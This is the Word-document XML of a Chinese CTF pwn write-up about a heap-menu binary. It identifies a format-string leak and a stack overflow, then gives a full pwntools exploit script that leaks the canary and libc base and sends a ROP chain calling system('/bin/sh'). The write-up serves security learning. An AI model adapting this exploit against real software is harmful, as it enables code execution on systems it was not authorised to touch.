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3EA30" w14:textId="0B2388F1" w:rsidR="00B1354B" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先checksec一下文件</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5053">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A30B59A" wp14:editId="6109FA47">
            <wp:extent cx="5274310" cy="1859915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="5509298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5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52669" w14:textId="77777777" w:rsidR="004B5053" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到ida看到有三个函数分别看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B8143" w14:textId="51F4E1D2" w:rsidR="004B5053" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Add函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0651CC9E" w14:textId="5A8416A2" w:rsidR="004B5053" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:r w:rsidRPr="004B5053">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD09D7C" wp14:editId="0ABEF32F">
            <wp:extent cx="5274310" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="10826614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614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33075" w14:textId="52CD8CA0" w:rsidR="004B5053" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里面要传两个参数第一个参数是要创建多大的的堆空间，第二个参数是在这个堆空间里面要写什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABB0FF" w14:textId="07929474" w:rsidR="004B5053" w:rsidRDefault="004B5053" w:rsidP="004B5053">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Show函数</w:t>
      </w:r>
      <w:r w:rsidR="00A07B31" w:rsidRPr="00A07B31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="420651B1" wp14:editId="43850F55">
            <wp:extent cx="5274310" cy="2092325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="8590061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06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7B31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里存在格式化字符串，这里也就是输入一个数字他会输出第几个堆块的东西，从0开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588F9CD" w14:textId="300ABC7E" w:rsidR="00A07B31" w:rsidRDefault="00A07B31" w:rsidP="004B5053">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07B31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>read_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCFA7FC" w14:textId="4A53D031" w:rsidR="00A07B31" w:rsidRDefault="00A07B31" w:rsidP="004B5053">
      <w:r w:rsidRPr="00A07B31">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C66B667" wp14:editId="2444359C">
            <wp:extent cx="5274310" cy="1627505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9486948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948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8EBEE" w14:textId="214C4C31" w:rsidR="00A07B31" w:rsidRDefault="00A07B31" w:rsidP="004B5053">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在delect函数里面套着一个这个函数，这里面存在栈溢出，第一个read我没看懂是个什么东西，第二个read妥妥的栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69ABDF" w14:textId="66F38352" w:rsidR="00A07B31" w:rsidRDefault="00A07B31" w:rsidP="004B5053">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就可以利用add和show来解出libc的基址和canary的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D47EFE" w14:textId="0ED61DC9" w:rsidR="00A07B31" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下wp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C409945" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544CBD4" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4C3CE3" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p = process('./0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F32EE0" w14:textId="3CBC2570" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A1693" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context(arch='amd64', os='linux', log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3720DF04" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03187F96" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def add(size, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE35CE1" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', b'1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F1734" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', str(size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA1337" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FD90F" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D6D123" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def free(index):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132230DE" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', b'2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B95F96" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', str(0x1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94B40A" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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sleep(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBC676" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendline(str(index))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32898D1C" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F748C1" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def show(index):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AF0F4B" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', b'3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAA1C3" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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p.sendlineafter('&gt;', str(index))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C96CD" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41EB99" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>add(0x500, b'canary --&gt; %7$p __libc_start_call_main --&gt; %13$p')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F81E1A" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA7BD42" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571489E2" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FA7526" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.recvuntil(b'canary --&gt; ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D08AD" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canary = int(p.recv(18), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F28E77" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.recvuntil(b' __libc_start_call_main --&gt; ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69505F38" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc = int(p.recv(14), 16) - 0x29D90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61C813" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print('canary --&gt; ', hex(canary))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01456DDA" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print('libc --&gt; ', hex(libc))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93FBB7" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2C8C2C" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070A607C" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendlineafter('&gt;', b'2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34242920" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendlineafter('&gt;', str(999))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A6D51" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44509B36" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'a'*0x10 + p64(canary) + p64(0xaaaaaaaa) + p64(libc + 0x2a3e5) + p64(libc + 0x1D8678) + p64(libc + 0x29139) + p64(libc + 0x50D70)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F37D6" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sleep(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE090C" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DDF851" w14:textId="77777777" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF602CD" w14:textId="364942A2" w:rsidR="007C3ED2" w:rsidRDefault="007C3ED2" w:rsidP="007C3ED2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
      <w:r w:rsidR="00651297" w:rsidRPr="00651297">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338E0E67" wp14:editId="159913FA">
            <wp:extent cx="5274310" cy="2293620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5125823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823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3E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0B36B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63C85A52"/>
    <w:lvl w:ilvl="0" w:tplc="3338404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33079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54B"/>
    <w:rsid w:val="004B5053"/>
    <w:rsid w:val="00651297"/>
    <w:rsid w:val="007C3ED2"/>
    <w:rsid w:val="00A07B31"/>
    <w:rsid w:val="00B1354B"/>
    <w:rsid w:val="00FE4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813AF7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7E2C052C-B778-47B7-935E-B0B1919B4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135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3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35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354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354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354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354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354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354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1354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135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135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1354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1354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1354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135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135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1354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1354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13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35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135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3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135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35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354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35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1354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135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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-15T13:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-15T14:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>